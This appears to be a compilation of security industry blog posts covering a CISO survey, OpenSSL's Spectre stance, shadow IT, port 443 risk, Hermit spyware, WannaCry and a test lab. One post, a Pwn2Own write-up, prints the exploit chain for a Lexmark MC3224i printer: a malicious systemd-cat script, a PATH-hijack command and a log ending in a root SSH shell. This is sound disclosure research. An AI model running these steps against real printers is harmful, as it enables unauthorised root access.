5 Key Things We Learned from CISOs of Smaller Enterprises Survey

New survey reveals lack of staff, skills, and resources driving smaller teams to outsource security.

As business begins its return to normalcy (however “normal” may look), CISOs at small and medium-size enterprises (500 – 10,000 employees) were asked to share their cybersecurity challenges and priorities, and their responses were compared the results with those of a similar survey from 2021.

Here are the 5 key things we learned from 200 responses:

— Remote Work Has Accelerated the Use of EDR Technologies

In 2021, 52% of CISOs surveyed were relying on endpoint detection and response (EDR) tools. This year that number has leapt to 85%. In contrast, last year 45% were using network detection and response (NDR) tools, while this year just 6% employ NDR. Compared to 2021, double the number of CISOs and their organizations are seeing the value of extended detection and response (XDR) tools, which combine EDR with integrated network signals. This is likely due to the increase in remote work, which is more difficult to secure than when employees work within the company’s network environment.

— 90% of CISOs Use an MDR Solution

There is a massive skills gap in the cybersecurity industry, and CISOs are under increasing pressure to recruit internally. Especially in small security teams where additional headcount is not the answer, CISOs are turning to outsourced services to fill the void. In 2021, 47% of CISOs surveyed relied on a Managed Security Services Provider (MSSP), while 53% were using a managed detection and response (MDR) service. This year, just 21% are using an MSSP, and 90% are using MDR.

— Overlapping Threat Protection Tools are the #1 Pain Point for Small Teams

The majority (87%) of companies with small security teams struggle to manage and operate their threat protection products. Among these companies, 44% struggle with overlapping capabilities, while 42% struggle to visualize the full picture of an attack when it occurs. These challenges are intrinsically connected, as teams find it difficult to get a single, comprehensive view with multiple tools.

— Small Security Teams Are Ignoring More Alerts

Small security teams are giving less attention to their security alerts. Last year 14% of CISOs said they look only at critical alerts, while this year that number jumped to 21%. In addition, organizations are increasingly letting automation take the wheel. Last year, 16% said they ignore automatically remediated alerts, and this year that’s true for 34% of small security teams.

— 96% of CISOs Are Planning to Consolidate Security Platforms

Almost all CISOs surveyed have consolidation of security tools on their to-do lists, compared to 61% in 2021. Not only does consolidation reduce the number of alerts – making it easier to prioritize and view all threats – respondents believe it will stop them from missing threats (57%), reduce the need for specific expertise (56%), and make it easier to correlate findings and visualize the risk landscape (46%). XDR technologies have emerged as the preferred method of consolidation, with 63% of CISOs calling it their top choice.

Download 2022 CISO Survey of Small Cyber Security Teams to see all the results.

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Spectre and Meltdown Attacks Against OpenSSL

The OpenSSL Technical Committee (OTC) was recently made aware of several potential attacks against the OpenSSL libraries which might permit information leakage via the Spectre attack.1 Although there are currently no known exploits for the Spectre attacks identified, it is plausible that some of them might be exploitable.

Local side channel attacks, such as these, are outside the scope of our security policy, however the project generally does introduce mitigations when they are discovered. In this case, the OTC has decided that these attacks will not be mitigated by changes to the OpenSSL code base. The full reasoning behind this is given below.

The Spectre attack vector, while applicable everywhere, is most important for code running in enclaves because it bypasses the protections offered. Example enclaves include, but are not limited to:

The reasoning behind the OTC’s decision to not introduce mitigations for these attacks is multifold:

  • Such issues do not fall under the scope of our defined security policy. Even though we often apply mitigations for such issues we do not mandate that they are addressed.
  • Maintaining code with mitigations in place would be significantly more difficult. Most potentially vulnerable code is extremely non-obvious, even to experienced security programmers. It would thus be quite easy to introduce new attack vectors or fix existing ones unknowingly. The mitigations themselves obscure the code which increases the maintenance burden.
  • Automated verification and testing of the attacks is necessary but not sufficient. We do not have automated detection for this family of vulnerabilities and if we did, it is likely that variations would escape detection. This does not mean we won’t add automated checking for issues like this at some stage.
  • These problems are fundamentally a bug in the hardware. The software running on the hardware cannot be expected to mitigate all such attacks. Some of the in-CPU caches are completely opaque to software and cannot be easily flushed, making software mitigation quixotic. However, the OTC recognises that fixing hardware is difficult and in some cases impossible.
  • Some kernels and compilers can provide partial mitigation. Specifically, several common compilers have introduced code generation options addressing some of these classes of vulnerability:
    • GCC has the -mindirect-branch-mfunction-return and -mindirect-branch-register options
    • LLVM has the -mretpoline option
    • MSVC has the /Qspectre option

  1. Nicholas Mosier, Hanna Lachnitt, Hamed Nemati, and Caroline Trippel, “Axiomatic Hardware-Software Contracts for Security,” in Proceedings of the 49th ACM/IEEE International Symposium on Computer Architecture (ISCA), 2022.

Posted by OpenSSL Technical Committee May 13th, 2022 12:00 am

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What is Shadow IT and why is it so risky?

Shadow IT refers to the practice of users deploying unauthorized technology resources in order to circumvent their IT department. Users may resort to using shadow IT practices when they feel that existing IT policies are too restrictive or get in the way of them being able to do their jobs effectively.

An old school phenomenon

Shadow IT is not new. There have been countless examples of widespread shadow IT use over the years. In the early 2000s, for example, many organizations were reluctant to adopt Wi-Fi for fear that it could undermine their security efforts. However, users wanted the convenience of wireless device usage and often deployed wireless access points without the IT department’s knowledge or consent.

The same thing happened when the iPad first became popular. IT departments largely prohibited iPads from being used with business data because of the inability to apply group policy settings and other security controls to the devices. Even so, users often ignored IT and used iPads anyway.

Of course, IT pros eventually figured out how to secure iPads and Wi-Fi and eventually embraced the technology. However, shadow IT use does not always come with a happy ending. Users who engage in shadow IT use can unknowingly do irreparable harm to an organization.

Even so, the problem of shadow IT use continues to this day. If anything, shadow IT use has increased over the last several years. In 2021 for example, Gartner found that between 30% and 40% of all IT spending (in a large enterprise) goes toward funding shadow IT.

Shadow IT is on the rise in 2022

Remote work post-pandemic

One reason for the rise in shadow IT use is remote work. When users are working from home, it is easier for them to escape the notice if the IT department than it might be if they were to try using unauthorized technology from within the corporate office. A study by Core found that remote work stemming from COVID requirements increased shadow IT use by 59%.

Tech is getting simpler for end-users

Another reason for the increase in shadow IT is the fact that it is easier than ever for a user to circumvent the IT department. Suppose for a moment that a user wants to deploy a particular workload, but the IT department denies the request.

A determined user can simply use their corporate credit card to set up a cloud account. Because this account exists as an independent tenant, IT will have no visibility into the account and may not even know that it exists. This allows the user to run their unauthorized workload with total impunity.

In fact, a 2020 study found that 80% of workers admitted to using unauthorized SaaS applications. This same study also found that the average company’s shadow IT cloud could be 10X larger than the company’s sanctioned cloud usage.

Know your own network

Given the ease with which a user can deploy shadow IT resources, it is unrealistic for IT to assume that shadow IT isn’t happening or that they will be able to detect shadow IT use. As such, the best strategy may be to educate users about the risks posed by shadow IT. A user who has a limited IT background may inadvertently introduce security risks by engaging in shadow IT. According to a Forbes Insights report 60% of companies do not include shadow IT in their threat assessments.

Similarly, shadow IT use can expose an organization to regulatory penalties. In fact, it is often compliance auditors – not the IT department – who end up being the ones to discover shadow IT use.

Of course, educating users alone is not sufficient to stopping shadow IT use. There will always be users who choose to ignore the warnings. Likewise, giving in to user’s demands for using particular technologies might not always be in the organization’s best interests either. After all, there is no shortage of poorly written or outdated applications that could pose a significant threat to your organization. Never mind applications that are known for spying on users.

The zero-trust solution to Shadow IT

One of the best options for dealing with shadow IT threats may be to adopt zero trust. Zero-trust is a philosophy in which nothing in your organization is automatically assumed to be trustworthy. User and device identities must be proven each time that they are used to access a resource.

There are many different aspects to a zero-trust architecture, and each organization implements zero-trust differently. Some organizations for instance, use conditional access policies to control access to resources. That way, an organization isn’t just granting a user unrestricted access to a resource, but rather is considering how the user is trying to access the resource. This may involve setting up restrictions around the user’s geographic location, device type, time of day, or other factors.

Zero-trust at the helpdesk

One of the most important things that an organization can do with regard to implementing zero trust is to better secure its helpdesk. Most organizations’ help desks are vulnerable to social engineering attacks.

When a user calls and requests a password reset, the helpdesk technician assumes that the user is who they claim to be, when in reality, the caller could actually be a hacker who is trying to use a password reset request as a way of gaining access to the network. Granting password reset requests without verifying user identities goes against everything that zero trust stands for.

Specops Software’s Secure Service Desk can eliminate this vulnerability by making it impossible for a helpdesk technician to reset a user’s password until that user’s identity has been proven. You can test it out for free to reduce the risks of shadow IT in your network.

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Securing Port 443: The Gateway To A New Universe

At Wordfence our business is to secure over 4 million WordPress websites and keep them secure. My background is in network operations, and then I transitioned into software development because my ops role was at a scale where I found myself writing a lot of code. This led me to founding startups, and ultimately into starting the cybersecurity business that is Wordfence. But I’ve maintained that ops perspective, and when I think about securing a network, I tend to think of ports.

You can find a rather exhaustive list of TCP and UDP ports on Wikipedia, but for the sake of this discussion let’s focus on a few of the most popular ports:

  • 20 and 21 – FTP
  • 22 – SSH
  • 23 – (Just kidding. You better not be running Telnet)
  • 25 – Email via SMTP
  • 53 – DNS
  • 80 – Unencrypted Web
  • 110 – POP3 (for older email clients)
  • 443 – Web encrypted via TLS
  • 445 – Active Directory or SMB sharing
  • 993 – IMAP (for email clients)
  • 3306 – MySQL
  • 6378 – Redis
  • 11211 – Memcached

If you run your eye down this list, you’ll notice something interesting. The options available to you for services to run on most of these ports are quite limited. Some of them are specific to a single application, like Redis. Others, like SMTP, provide a limited number of applications, either proprietary or open-source. In both cases, you can change the configuration of the application, but it’s rare to write a custom application on one of those ports. Except port 443.

In the case of port 443 and port 80, you have a limited range of web servers listening on those ports, but users are writing a huge range of bespoke applications on port 443, and have a massive selection of applications that they can host on that port. Everything from WordPress to Drupal to Joomla, and more. There are huge lists of Content Management Systems.

Not only do you have a wide range of off-the-shelf web applications that you can run on port 443 or (if you’re silly) port 80, but you also have a range of languages they might be coded in, or in which you can code your own web application. Keep in mind that the web server, in this case, is much like an SSH or IMAP server in that it is listening on the port and handling connections, but the difference is that it is handing off execution to these languages, their various development frameworks, and ultimately the application that a developer has written to handle the incoming request.

With SSH, SMTP, FTP, IMAP, MySQL, Redis and most other services, the process listening on the port is the process that handles the request. With web ports, the process listening on the port delegates the incoming connection to another application, usually written in another language, running at the application layer, that is part of the extremely large and diverse ecosystem of web applications.

This concept in itself – that the applications listening on the web ports are extremely diverse and either home-made or selected from a large and diverse ecosystem – presents unique security challenges. In the case of, say, Redis, you might worry about running a secure version of Redis and making sure it is not misconfigured. In the case of a web server, you may have 50 application instances written in two languages from five different vendors all on the same port, which all need to be correctly configured, have their patch levels maintained, and be written using secure coding practices.

As if that doesn’t make the web ports challenging enough, they are also, for the most part, public. Putting aside internal websites for the moment, perhaps the majority of websites derive their value from making services available to users on the Internet by being public-facing. If you consider the list of ports I have above, or in the Wikipedia article I linked to, many of those ports are only open on internal networks or have access to them controlled if they are external. Web ports for public websites, by their very nature, must be publicly accessible for them to be useful. There are certain public services like SMTP or DNS, but as I mentioned above, the server that is listening on the port is the server handling the request in these cases.

A further challenge when securing websites is that often the monetary and data assets available to an attacker when compromising a website are greater than the assets they may gain compromising a corporate network. You see this with high volume e-commerce websites where a small business is processing a large number of web-based e-commerce transactions below $100. If the attacker compromises their corporate network via leaked AWS credentials, they may gain access to the company bank account and company intellectual property, encrypt the company’s data using ransomware, or perhaps even obtain customer PII. But by compromising the e-commerce website, they can gain access to credit card numbers in-flight, which are far more tradeable, and where the sum of available credit among all cards is greater than all the assets of the small business, including the amount of ransom that business might be able to pay.

Let’s not discount breaches like the 2017 Equifax breach that compromised 163 million American, British and Canadian citizen’s records. That was extremely valuable to the attackers. But targets like this are rare, and the Web presents a target-rich environment. Which is the third point I’d like to make in this post. While an organization may run a handful of services on other ports, many companies – with hosting providers in particular – run a large number of web applications. And an individual or company is far more likely to have a service running on a web port than any other port. Many of us have websites, but how many of us run our own DNS, SMTP, Redis, or another service listening on a port other than 80 or 443? Most of us who run websites also run MySQL on port 3306, but that port should not be publicly accessible if configured correctly.

That port 443 security is different has become clear to us at Wordfence over the years as we have tracked and cataloged a huge number of malware variants, web vulnerabilities, and a wide range of tactics, techniques, and procedures (TTP) that attackers targeting web applications use. Most of these have no relationship with the web server listening on port 443, and nearly all of them have a close relationship with the web application that the web server hands off control to once communication is established.

My hope with this post has been to catalyze a different way of thinking about port 443 and that other insecure port (80) we all hopefully don’t use. Port 443 is not just another service. It is, in fact, the gateway to a whole new universe of programming languages, dev frameworks, and web applications.

In the majority of cases, the gateway to that new universe is publicly accessible.

Once an attacker passes through that gateway, a useful way to think about the web applications hosted on the server is that each application is its own service that needs to have its patch level maintained, needs to be configured correctly, and should be removed if it is not in use to reduce the available attack surface.

If you are a web developer you may already think this way, and if anything, you may be guilty of neglecting services on ports other than port 80 or 443. If you are an operations engineer, or an analyst working in a SOC protecting an enterprise network, you may be guilty of thinking about port 443 as just another port you need to secure.

Think of port 443 as a gateway to a new universe that has no access control, with HTTPS providing easy standardized access, and with a wide range of diverse services running on the other side, that provide an attacker with a target and asset-rich environment.

Footnote: We will be exhibiting at Black Hat in Las Vegas this year at booth 2514 between the main entrance and Innovation City. Our entire team of over 30 people will be there. We’ll have awesome swag, as always. Come and say hi! Our team will also be attending DEF CON immediately after Black Hat.

Written by Mark Maunder – Founder and CEO of Wordfence. 

Source :

For the Common Good: How to Compromise a Printer in Three Simple Steps

In August 2021, ZDI announced Pwn2Own Austin 2021, a security contest focusing on phones, printers, NAS devices and smart speakers, among other things. The Pwn2Own contest encourages security researchers to demonstrate remote zero-day exploits against a list of specified devices. If successful, the researchers are rewarded with a cash prize, and the leveraged vulnerabilities are responsibly disclosed to the respective vendors so they can improve the security of their products.

After reviewing the list of devices, we decided to target the Cisco RV340 router and the Lexmark MC3224i printer, and we managed to identify several vulnerabilities in both of them. Fortunately, we were luckier than last year and were able to participate in the contest for the first time. By successfully exploiting both devices, we won $20,000 USD, which CrowdStrike donated to several charitable organizations chosen by our researchers.

In this blog post, we outline the vulnerabilities we discovered and used to compromise the Lexmark printer.


ProductLexmark MC3224
Affected Firmware Versions
(without claim for completeness)
CXLBL.075.272 (2021-07-29)
CXLBL.075.281 (2021-10-14)
Fixed Firmware VersionCXLBL.076.294 (CVE-2021-44735) Note: Users must implement a workaround to address CVE-2021-44736, see Lexmark Security Alert
CVECVE-2021-44735 (Shell Command Injection)
CVE-2021-44736 (Authentication Reset)
Root CausesAuthentication Bypass, Shell Command Injection, Insecure SUID Binary
ImpactUnauthenticated Remote Code Execution (RCE) as root
ResearchersHanno Heinrichs, Lukas Kupczyk
Lexmark Resourceshttps[:]//publications.lexmark[.]com/publications/security-alerts/CVE-2021-44735.pdf

Step #1: Increasing Attack Surface via Authentication Reset

Before we could start our analysis, we first had to obtain a copy of the firmware. It quickly turned out that the firmware is shipped as an .fls file in a custom binary format containing encrypted data. Luckily, a detailed writeup on the encryption scheme had been published in September 2020. While the writeup did not include code or cryptographic keys, it was elaborate enough that we were able to quickly reproduce it and write our own decrypter. With our firmware decryption tool at hand, we were finally able to peek into the firmware.

It was assumed that the printer would be in a default configuration during the contest and that the setup wizard on the printer had been completed. Thus, we expected the administrator password to be set to an unknown value. In this state, unauthenticated users can still trigger a vast amount of actions through the web interface. One of these is Sanitize all information on nonvolatile memory. It can be found under Settings -> Device -> Maintenance. There are several options to choose from when performing that action:

[x] Sanitize all information on nonvolatile memory
  (x) Start initial setup wizard
  ( ) Leave printer offline
[x] Erase all printer and network settings
[x] Erase all shortcuts and shortcut settings

[Start] [Reset]

If the checkboxes are ticked as shown, the process can be initiated through the Start button. The printer’s non-volatile memory will be cleared and a reboot is initiated. This process takes approximately two minutes. Afterward, unauthenticated users can access all functions through the web interface.

Step #2: Shell Command Injection

After resetting the nvram as outlined in the previous section, the CGI script https://target/cgi-bin/sniffcapture_post becomes accessible without authentication. It was previously discovered by browsing the decrypted firmware and is located in the directory /usr/share/web/cgi-bin.

At the beginning of the script, the supplied POST body is stored in the variable data. Afterward, several other variables such as interfacedestpath and filter are extracted and populated from that data by using sed:

read data

if [ "x${remove}" != "x1" ]; then
interface=$(echo ${data} | sed -n 's|^.*-i[[:space:]]\([^[:space:]]\+\).*$|\1|p')
dest=$(echo ${data} | sed -n 's|^.*-f[[:space:]]\([^[:space:]]\+\).*$|\1|p')
path=$(echo ${data} | sed -n 's|^.*-f[[:space:]]\([^[:space:]]\+\).*$|\1|p')
if [ "x${dest}" = "x/dev/null" ]; then
elif [ "x${dest}" = "x/usr/bin" ]; then
filter=$(echo ${data} | sed -n 's|^.*-F[[:space:]]\+\(["]\)\(.*\)\1.*$|\2|p')
args="-i ${interface} -f ${dest}/sniff_control.pcap"

The variable filter is determined by a quoted string following the value -F specified in the POST body. As shown below, it is later embedded into the args variable in case it has been specified along with an interface:

if [ ${remove} -ne 0 ]; then
    args="${args} remove 1"
if [ -n "${interface}" ]; then
    args="${args} interface ${interface}"
    if [ -n "${filter}" ]; then
        args="${args} filter \"${filter}\""
    if [ ${auto} -ne 0 ]; then
        args="${args} auto 1"
        args="${args} dest ${dest}"

At the end of the script, the resulting args value is used in an eval statement:

if [ -n "${fmt}" ]; then
    resp=$(eval rob call system.sniffer ${method} "{${fmt}}" ${args:1} 2>/dev/null)

By controlling the filter variable, attackers are therefore able to inject further shell commands and gain access to the printer as uid=985(httpd), which is the user that the web server is executed as.

Step #3: Privilege Escalation

The printer ships a custom root-owned SUID binary called collect-selogs-wrapper:

# ls -la usr/bin/collect-selogs-wrapper
-rwsr-xr-x. 1 root root 7324 Jun 14 15:46 usr/bin/collect-selogs-wrapper

In its main() function, the effective user ID (0) is retrieved and the process’s real user ID is set to that value. Afterward, the shell script /usr/bin/collect-selogs.sh is executed:

int __cdecl main(int argc, const char **argv, const char **envp)
  __uid_t euid; // r0

  euid = geteuid();
  if ( setuid(euid) )
  return execv("/usr/bin/collect-selogs.sh", (char *const *)argv);

Effectively, the shell script is executed as root with UID=EUID, and therefore the shell does not drop privileges. Furthermore, argv[] of the SUID binary is passed to the shell script. As the environment variables are also retained across the execv() call, an attacker is able to specify a malicious $PATH value. Any command inside the shell script that is not referenced by its absolute path can thereby be detoured by the attacker.

The first opportunity for such an attack is the invocation of systemd-cat inside sd_journal_print():

# cat usr/bin/collect-selogs.sh
# Collects fwdebug from the current state plus the last 3 fwdebug files from
# previous auto-collections. The collected files will be archived and compressed
# to the requested output directory or to the standard output if the output
# directory is not specified.

sd_journal_print() {
    systemd-cat -t collect-selogs echo "$@"

sd_journal_print "Start! params: '$@'"


The /dev/shm directory can be used to prepare a malicious version of systemd-cat:

$ cat /dev/shm/systemd-cat
mount -o remount,suid /dev/shm
cp /usr/bin/python3 /dev/shm
chmod +s /dev/shm/python3
$ chmod +x /dev/shm/systemd-cat

This script remounts /dev/shm with the suid flag so that SUID binaries can be executed from it. It then copies the system’s Python interpreter to the same directory and enables the SUID bit on it. The malicious systemd-cat copy can be executed as root by invoking the setuid collect-setlogs-wrapper binary like this:

$ PATH=/dev/shm:$PATH /usr/bin/collect-selogs-wrapper

The $PATH environment variable is prepended with the /dev/shm directory that hosts the malicious systemd-cat copy. After executing the command, a root-owned SUID-enabled copy of the Python interpreter is located in /dev/shm:

root@ET788C773C9E20:~# ls -la /dev/shm
drwxrwxrwt    2 root     root           100 Oct 29 09:33 .
drwxr-xr-x   13 root     root          5160 Oct 29 09:31 ..
-rwsr-sr-x    1 root     httpd         8256 Oct 29 09:33 python3
-rw-------    1 nobody   nogroup         16 Oct 29 09:31 sem.netapps.rawprint
-rwxr-xr-x    1 httpd    httpd           96 Oct 29 09:33 systemd-cat

The idea behind this technique is to establish a simple way of escalating privileges without having to exploit the initial collect_selogs_wrapper SUID again. We did not use the Bash binary for this, as the version shipped with the printer seems to ignore the -p flag when running with UID!=EUID.


An exploit combining the three vulnerabilities to gain unauthenticated code execution as root  has been implemented as a Python script. First, the exploit tries to determine whether the printer has a login password set (i.e., setup wizard has been completed) or it is password-less (i.e., authentication reset already executed earlier or setup wizard not yet completed). Depending on the result, it decides whether the non-volatile memory reset is required.

If the non-volatile memory reset is triggered, the exploit waits for the printer to finish rebooting. Afterward, it continues with the shell command injection step and escalation of privileges. The privileged access is then used to start an OpenSSH daemon on the printer. To finish, the exploit establishes an interactive SSH session with the printer and hands control over to the user. An example run of the exploit in a testing environment follows:

$ ./mc3224i_exploit.py sshd
[*] Probing device...
[+] Firmware: CXLBL.075.281
[+] Acceptable login methods: ['LDAP_DEVICE_REALM',        
[*] Device IS password protected, auth bypass required
[*] Erasing nvram...
[+] Success! HTTP status: 200, rc=1
[*] Waiting for printer to reboot, sleeping 5 seconds...
[*] Checking status...
[+] Reboot finished
[*] Probing device...
[+] Firmware: CXLBL.075.281
[+] Acceptable login methods: ['LDAP_DEVICE_REALM']
[*] Device IS NOT password protected
[+] Authentication bypass done
[*] Attempting to escalate privileges...
[*] Executing command (root? False):
    echo -e '#!/bin/sh\\n
    mount -o remount,suid /dev/shm\\n
    cp /usr/bin/python3 /dev/shm\\nchmod +s /dev/shm/python3' >
    /dev/shm/systemd-cat; chmod +x /dev/shm/systemd-cat
[+] HTTP status: 200
[*] Executing command (root? False): PATH=/dev/shm:$PATH /usr/bin/collect-selogs-wrapper
[+] request timed out, that’s what we expect
[+] SUID Python interpreter should be created
[*] Attempting to enable SSH daemon...
[*] Executing command (root? True):
sed -Ee 's/(RSAAuthentication|UsePrivilegeSeparation|UseLogin)/#\\1/g'
    -e 's/AllowUsers guest/AllowUsers root guest/'
    /etc/ssh/sshd_config_perf > /tmp/sshconf;
    mkdir /var/run/sshd;
    iptables -I INPUT 1 -p tcp --dport 22 -j ACCEPT;
    nohup /usr/sbin/sshd -f /tmp/sshconf &
[+] HTTP status: 200
[+] SSH daemon should be running
[*] Trying to call ssh... ('ssh', '-i', '/tmp/tmpd2vc5a2u', 'root@')
root@ET788C773C9E20:~# id
uid=0(root) gid=0(root) groups=0(root)


In this blog, we described a number of vulnerabilities that can be exploited from the local network to bypass authentication, execute arbitrary shell commands, and elevate privileges on a Lexmark MC3224i printer. The research started as an experiment after the announcement of the Pwn2Own Austin 2021. The team enjoyed the challenge, as well as participating in Pwn2Own for the first time, and we welcome your feedback. We’d also like to invite you to read about the other device we successfully targeted during Pwn2Own Austin 2021, the Cisco RV340 router.

Additional Resources

Google Says ISPs Helped Attackers Infect Targeted Smartphones with Hermit Spyware

A week after it emerged that a sophisticated mobile spyware dubbed Hermit was used by the government of Kazakhstan within its borders, Google said it has notified Android users of infected devices.

Additionally, necessary changes have been implemented in Google Play Protect — Android’s built-in malware defense service — to protect all users, Benoit Sevens and Clement Lecigne of Google Threat Analysis Group (TAG) said in a Thursday report.

Hermit, the work of an Italian vendor named RCS Lab, was documented by Lookout last week, calling out its modular feature-set and its abilities to harvest sensitive information such as call logs, contacts, photos, precise location, and SMS messages.

Once the threat has thoroughly insinuated itself into a device, it’s also equipped to record audio and make and redirect phone calls, in addition to abusing its permissions to accessibility services to keep tabs on the foreground apps used by the victims.

Its modularity also enables it to be wholly customizable, equipping the spyware’s functionality to be extended or altered at will. It’s not immediately clear who were targeted in the campaign, or which of RCS Lab clients were involved.

The Milan-based company, operating since 1993, claims to provide “law enforcement agencies worldwide with cutting-edge technological solutions and technical support in the field of lawful interception for more than twenty years.” More than 10,000 intercepted targets are purported to be handled daily in Europe alone.

“Hermit is yet another example of a digital weapon being used to target civilians and their mobile devices, and the data collected by the malicious parties involved will surely be invaluable,” Richard Melick, director of threat reporting for Zimperium, said.

The targets have their phones infected with the spy tool via drive-by downloads as initial infection vectors, which, in turn, entails sending a unique link in an SMS message that, upon clicking, activates the attack chain.

It’s suspected that the actors worked in collaboration with the targets’ internet service providers (ISPs) to disable their mobile data connectivity, followed by sending an SMS that urged the recipients to install an application to restore mobile data access.

“We believe this is the reason why most of the applications masqueraded as mobile carrier applications,” the researchers said. “When ISP involvement is not possible, applications are masqueraded as messaging applications.”

To compromise iOS users, the adversary is said to have relied on provisioning profiles that allow fake carrier-branded apps to be sideloaded onto the devices without the need for them to be available on the App Store.


An analysis of the iOS version of the app shows that it leverages as many as six exploits — CVE-2018-4344CVE-2019-8605CVE-2020-3837CVE-2020-9907CVE-2021-30883, and CVE-2021-30983 — to exfiltrate files of interest, such as WhatsApp databases, from the device.

“As the curve slowly shifts towards memory corruption exploitation getting more expensive, attackers are likely shifting too,” Google Project Zero’s Ian Beer said in a deep-dive analysis of an iOS artifact that impersonated the My Vodafone carrier app.

On Android, the drive-by attacks require that victims enable a setting to install third-party applications from unknown sources, doing so which results in the rogue app, masquerading as smartphone brands like Samsung, requests for extensive permissions to achieve its malicious goals.

The Android variant, besides attempting to root the device for entrenched access, is also wired differently in that instead of bundling exploits in the APK file, it contains functionality that permits it to fetch and execute arbitrary remote components that can communicate with the main app.

“This campaign is a good reminder that attackers do not always use exploits to achieve the permissions they need,” the researchers noted. “Basic infection vectors and drive by downloads still work and can be very efficient with the help from local ISPs.”

Stating that seven of the nine zero-day exploits it discovered in 2021 were developed by commercial providers and sold to and used by government-backed actors, the tech behemoth said it’s tracking more than 30 vendors with varying levels of sophistication who are known to trade exploits and surveillance capabilities.

What’s more, Google TAG raised concerns that vendors like RCS Lab are “stockpiling zero-day vulnerabilities in secret” and cautioned that this poses severe risks considering a number of spyware vendors have been compromised over the past ten years, “raising the specter that their stockpiles can be released publicly without warning.”

“Our findings underscore the extent to which commercial surveillance vendors have proliferated capabilities historically only used by governments with the technical expertise to develop and operationalize exploits,” TAG said.

“While use of surveillance technologies may be legal under national or international laws, they are often found to be used by governments for purposes antithetical to democratic values: targeting dissidents, journalists, human rights workers and opposition party politicians.”

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Anti-Ransomware Day: What Can We Do to Prevent the Next WannaCry?

This Anti-Ransomware Day, SonicWall looks at how cybersecurity has changed since WannaCry — and what we can do to ensure we never see such a widespread, devastating and preventable attack again.

On May 12, 2017, attackers identified a vulnerability in a Windows device somewhere in Europe — and in the process, set off an attack that would ultimately impact roughly 200,000 victims and over 300,000 endpoints across 150 countries. The devastation wrought by WannaCry caused financial losses of roughly $4 billion before the strain was halted by an unlikely hero just hours later. But perhaps most devastating of all was that it was completely preventable.

To help raise awareness about ransomware strains like WannaCry and the steps needed to combat them, INTERPOL in 2020 teamed up with cybersecurity firm Kaspersky to declare May 12 Anti-Ransomware Day. By taking a few important steps, organizations can help stop the next major ransomware attack, averting the potential for downtime, reputational damage, fines and more.

“Cybercrime and cybersecurity may seem like a complex issue that is difficult to understand unless you are an expert in the field — this is not the case. INTERPOL’s campaign aims to demystify these cyberthreats and offer simple, concrete steps which everybody can take to protect themselves,” INTERPOL’s Director of Cybercrime Craig Jones said.

What’s Changed Since WannaCry?

In the years since the infamous attack, ransomware has continued to grow. In 2021, SonicWall Capture Labs threat researchers recorded 623.3 million ransomware attempts on customers globally. This represents an increase of 105% from 2020’s total and a staggering 232% since 2019.

And while ransomware was a hot topic worldwide due to attacks such as WannaCry and NotPetya, which would begin its own savage trek across the globe just six weeks later, ransomware volume in 2017 was less than a third of what it was in 2021.

Weakened, but Still Wreaking Havoc

While variants such as Ryuk, SamSam and Cerber made up 62% of the ransomware attacks recorded by SonicWall in 2021, WannaCry lives on — and in surprising numbers. By now, five years on, the number of vulnerable Windows systems should be virtually zero. A patch for the EternalBlue vulnerability exploited by WannaCry was released two months prior to the attack, and Microsoft later took the unusual step of also releasing patches for Windows systems that were old and no longer supported.

But in 2020, SonicWall observed 233,000 instances of WannaCry, and in 2021, 100,000 hits were observed — indicating that there are still vulnerable Windows systems in the wild that need to be patched.

We Can Worry … Or Get to Work

What made WannaCry so successful was that many organizations at the time took a set-it-and-forget-it approach to IT, leaving vulnerable hundreds of thousands of endpoints that could otherwise have been patched prior to the attack. But while patching is a crucial part of any cybersecurity strategy, it can’t work alone — there are still a number of other steps organizations need to take to bolster their odds against the next big ransomware attack.

  • Update: Whenever possible, enable automatic updates on applications and devices on your network — both for operating systems and for any other apps in your ecosystem.
  • Upgrade: The older an operating system gets, the more malware and other threats are created to target them. Retire any software or hardware that is obsolete or no longer supported by the vendor.
  • Duplicate: All important data should be backed up to a place inaccessible by attackers. Having adequate and up-to-date backups on hand significantly eases recovery in the event of a ransomware attack.
  • Educate: A staggering 91% of all cyberattacks start with someone opening a phishing email. Teach employees to be wary any time they receive an email, particularly one with an attachment or link.
  • Safeguard: By taking the above steps, most attacks can be prevented, but not all. They’re called “best practices” and not “universal practices” for a reason: If any are allowed to lapse — or new methods are found to circumvent them — organizations will need a strong last line of defense. An advanced, multi-layer platform that includes endpoint security, next-gen firewall services, email security and secure mobile access can work to eliminate blind spots and eradicate both known and unknown threats.

“In the past two years, we have seen how cybercriminals have become bolder in using ransomware. Organizations targeted by such attacks are not limited to corporations and governmental organizations — ransomware operators are ready to hit essentially any business regardless of size,” Jones said. “To fight them, we need to educate ourselves on how they work and fight them as one. Anti-Ransomware Day is a good opportunity to highlight this need and remind the public of how important it is to adopt effective security practices.”

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UI Expands Lab With Anechoic Chambers to Deliver Products Faster

Ubiquiti’s Salt Lake City-based engineering team has expanded its regulatory compliance and engineering development laboratory to include state-of-the-art anechoic chambers: the 10/5/3 m Multi-Axis Anechoic Chamber & the 3 m Anechoic Dome-Roofed Chamber.

This laboratory expansion gives us capabilities to speed up product development cycles, ensuring product quality and improving our time to market in a growing number of countries.

10/5/3 m Multi-Axis Anechoic Chamber

Chamber 1: Frankonia SAC-10 Plus Triton chamber with three measurement axes

The Frankonia SAC-10 Plus Triton chamber (19.21 m x 12.08 m x 8.18 m) is the top-of-the-line model from the manufacturer. It’s the only one of its kind in the world outside the manufacturer’s lab.

The specialized “Triton” form factor allows us to have three different emission and immunity test setups in place at once:

  • Test Axis 1: Low-frequency emissions compliant with ANSI C.63.4 + CISPR 16-1-4 (NSA)
  • Test Axis 2: High-frequency and RF emissions compliant with ANSI C.63.10 + CISPR 16-1-4 (SVSWR)
  • Test Axis 3: Radiated RF Immunity compliant with IEC/EN61000-4-3 (FU)

With this setup, our engineers can perform the required electromagnetic interference (EMI) and electromagnetic susceptibility (EMS) procedures with reduced setup changes, saving hours of time with each iterative test. Keeping the same setup in place reduces the time needed to complete the tests and makes them reproducible.

The Device Under Test (DUT) is placed on a non-reflective (styrofoam) table on top of a rotating turntable. Extensive test automation actuates the test equipment, antennas, and turntable while performing the required tests at all angles.

Anechoic chambers offer excellent isolation against interference from the surrounding environment. Carefully designed and positioned absorbers significantly remove radio frequency (RF) reflections. The SAC-10 Plus Triton chamber provides a 9 kHz to 40 GHz measurement frequency range. The metal exterior shielding provides over 100 dB of attenuation from the outside world.

